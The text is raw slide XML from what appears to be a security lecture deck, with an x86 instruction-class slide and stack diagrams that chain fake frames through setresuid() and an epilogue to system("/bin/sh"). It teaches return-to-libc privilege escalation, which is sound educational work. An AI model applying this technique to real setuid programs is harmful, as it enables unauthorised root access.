          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6363163" y="3600450"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Right Arrow 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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99" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155180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93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93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093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93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93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93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093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93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093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9392"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="25"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12093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93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093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093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0939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093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0939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094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094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0940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0940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940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0940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094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094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0941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0941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09416"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="69" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="69"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120941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0941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941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0942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0942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0942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094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0942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20942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0942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0942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0942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0942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20943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0943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0943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09434"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="111" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="111"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120943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20943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0943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0944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20944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0944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20944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20944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20944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20944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20944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20944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209449"/>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97"/>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353" grpId="0" animBg="1"/>
      <p:bldP spid="1209354" grpId="0" animBg="1"/>
      <p:bldP spid="1209362" grpId="0" animBg="1"/>
      <p:bldP spid="1209384" grpId="0" animBg="1"/>
      <p:bldP spid="1209385" grpId="0" animBg="1"/>
      <p:bldP spid="1209386" grpId="0" animBg="1"/>
      <p:bldP spid="1209389" grpId="0" animBg="1"/>
      <p:bldP spid="1209390" grpId="0" animBg="1"/>
      <p:bldP spid="1209391" grpId="0" animBg="1"/>
      <p:bldP spid="1209392" grpId="0" animBg="1"/>
      <p:bldP spid="1209393" grpId="0"/>
      <p:bldP spid="1209394" grpId="0" animBg="1"/>
      <p:bldP spid="1209395" grpId="0" animBg="1"/>
      <p:bldP spid="1209396" grpId="0" animBg="1"/>
      <p:bldP spid="1209397" grpId="0" animBg="1"/>
      <p:bldP spid="1209398" grpId="0" animBg="1"/>
      <p:bldP spid="1209399" grpId="0" animBg="1"/>
      <p:bldP spid="1209401" grpId="0" animBg="1"/>
      <p:bldP spid="1209402" grpId="0" animBg="1"/>
      <p:bldP spid="1209403" grpId="0" animBg="1"/>
      <p:bldP spid="1209407" grpId="0" animBg="1"/>
      <p:bldP spid="1209408" grpId="0" animBg="1"/>
      <p:bldP spid="1209409" grpId="0" animBg="1"/>
      <p:bldP spid="1209411" grpId="0" animBg="1"/>
      <p:bldP spid="1209413" grpId="0" animBg="1"/>
      <p:bldP spid="1209414" grpId="0" animBg="1"/>
      <p:bldP spid="1209415" grpId="0" animBg="1"/>
      <p:bldP spid="1209416" grpId="0" animBg="1"/>
      <p:bldP spid="1209417" grpId="0"/>
      <p:bldP spid="1209418" grpId="0" animBg="1"/>
      <p:bldP spid="1209419" grpId="0" animBg="1"/>
      <p:bldP spid="1209420" grpId="0" animBg="1"/>
      <p:bldP spid="1209421" grpId="0" animBg="1"/>
      <p:bldP spid="1209422" grpId="0" animBg="1"/>
      <p:bldP spid="1209423" grpId="0" animBg="1"/>
      <p:bldP spid="1209424" grpId="0" animBg="1"/>
      <p:bldP spid="1209425" grpId="0" animBg="1"/>
      <p:bldP spid="1209426" grpId="0" animBg="1"/>
      <p:bldP spid="1209427" grpId="0" animBg="1"/>
      <p:bldP spid="1209428" grpId="0" animBg="1"/>
      <p:bldP spid="1209429" grpId="0" animBg="1"/>
      <p:bldP spid="1209431" grpId="0" animBg="1"/>
      <p:bldP spid="1209432" grpId="0" animBg="1"/>
      <p:bldP spid="1209433" grpId="0" animBg="1"/>
      <p:bldP spid="1209434" grpId="0" animBg="1"/>
      <p:bldP spid="1209435" grpId="0"/>
      <p:bldP spid="1209438" grpId="0" animBg="1"/>
      <p:bldP spid="1209439" grpId="0" animBg="1"/>
      <p:bldP spid="1209440" grpId="0" animBg="1"/>
      <p:bldP spid="1209441" grpId="0" animBg="1"/>
      <p:bldP spid="1209442" grpId="0" animBg="1"/>
      <p:bldP spid="1209443" grpId="0" animBg="1"/>
      <p:bldP spid="1209444" grpId="0" animBg="1"/>
      <p:bldP spid="1209445" grpId="0" animBg="1"/>
      <p:bldP spid="1209446" grpId="0" animBg="1"/>
      <p:bldP spid="1209447" grpId="0" animBg="1"/>
      <p:bldP spid="1209448" grpId="0" animBg="1"/>
      <p:bldP spid="1209449" grpId="0"/>
      <p:bldP spid="69" grpId="0"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</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xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, push, pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Binary arithmetic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add, sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>imul</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mul</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idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, div, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>inc</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dec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>and, or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210956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5" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4448255" y="3943350"/>
            <a:ext cx="0" cy="12573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396" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2543255" y="3943350"/>
            <a:ext cx="0" cy="12573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397" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4448255" y="52006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398" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2543255" y="52006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399" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451305" y="4423173"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211400" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="33718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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211401" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="30861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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="28003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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="25146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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211404" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2550083" y="22288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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211405" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="19431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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211406" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="16573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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211407" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="13716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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211408" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2543255" y="10858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409" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4448255" y="10858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410" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543255" y="36576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saved ebp (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211411" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2571827" y="4114802"/>
            <a:ext cx="1529586" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the situation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>after returning from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() and before</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>jumping to an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6658055" y="3657600"/>
            <a:ext cx="0" cy="15430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413" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4753055" y="3657600"/>
            <a:ext cx="0" cy="15430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414" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6658055" y="52006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415" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4753055" y="52006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416" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5661105" y="4423173"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211417" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="33718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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211418" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="30861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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211419" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="28003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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211420" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="25146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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211421" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="22288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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211422" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="19431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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211423" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="16573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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211424" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753055" y="13716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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211425" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4753055" y="10858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426" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6658055" y="10858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428" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4829255" y="4114801"/>
            <a:ext cx="1428596" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>When epilogue is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>called, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> points to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211429" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8867855" y="2514600"/>
            <a:ext cx="0" cy="26860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430" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6962855" y="2514600"/>
            <a:ext cx="0" cy="26860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431" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
